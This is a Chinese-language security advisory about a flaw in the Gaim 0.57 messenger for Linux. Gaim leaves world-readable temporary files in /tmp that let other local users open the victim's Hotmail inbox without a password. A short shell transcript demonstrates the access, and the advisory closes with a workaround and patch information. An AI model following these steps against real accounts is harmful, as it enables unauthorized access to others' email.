??涉及程序:??Gaim 0.57 通讯软件客户端
??描述:??利用Gaim漏洞进入别人的hotmail邮箱
??详细:??Gaim是Linux平台下一个可以模拟几大即时通讯程序的软件,其中包括MSN和AOL的即时通讯软件。
??此漏洞出现在使用MSN messager的时候。因为要登录MSN,用户被要求输入hotmail的用户名和密码。建立好MSN帐号并设置Gaim每启动时都检查hotmail邮箱,这时Gaim会在/tmp目录下建立两个临时文件:
??(1) 这两个文件的命名如下: file 比如: fileYbcYGF23??(2) 文件有如下权限: 4 -rw-rw-r-- 1 smackenz smackenz 978 May 12 03:01 /tmp/file984345(smackenz是Gaim的用户名)
??如你所见,文件的权限设置让系统上任何一个用户都可以对这两个临时文件进行阅读。
??这时如果使用系统上其他的用户登录,并进入到/tmp目录,使用浏览器打开两个临时文件的其中一个,你会发现你正进入到Gaim用户的hotmail邮箱而无需输入任何密码。
??*注意*: 只有在上述Gaim用户没有关闭程序或只关闭了一段很短时间的时候,此漏洞才可被利用。可能是因为hotmail的进程id会随着时间而改变,所以Gaim一旦关闭了很久,利用此漏洞也不可能进入到hotmail的邮箱里了。
??附上利用此漏洞的过程:
??[smackenz@smackenz smackenz]$ ls /tmp |grep file*
??[smackenz@smackenz smackenz]$ id
??uid=500(smackenz) gid=500(smackenz) groups=500(smackenz)
??[smackenz@smackenz smackenz]$ gaim
??[smackenz@smackenz smackenz]$ ls /tmp |grep file*
??file8veFxR
??fileKGVdms
??[smackenz@smackenz smackenz]$ su user
??Password:
??[user@smackenz smackenz]$ id
??uid=501(user) gid=501(user) groups=501(user)
??[user@smackenz user]$ ls -las /tmp/file*
??4 -rw-rw-r-- 1 smackenz smackenz 978 May 12 03:11
??/tmp/file8veFxR
??4 -rw-rw-r-- 1 smackenz smackenz 978 May 12 03:11
??/tmp/fileKGVdms
??[user@smackenz user]$ cd /tmp
??[user@smackenz tmp]$ ls |grep file
??fileCHuvIp
??fileFbpaYB
??[user@smackenz tmp]$ galeon fileCHuvIp
??解决方案
??一个临时的解决方法是重编译Gaim时设置好/tmp目录的权限,使其他系统用户不能读取临时文件的内容。 对此漏洞的补丁可以下面地址下载:[[The No.1 Link Start.]]http://gaim.sourceforge.net/downloads.php[[The No.1 Link End.]]
??另: 在将发布的Gaim 0.58版,此漏洞将被修正。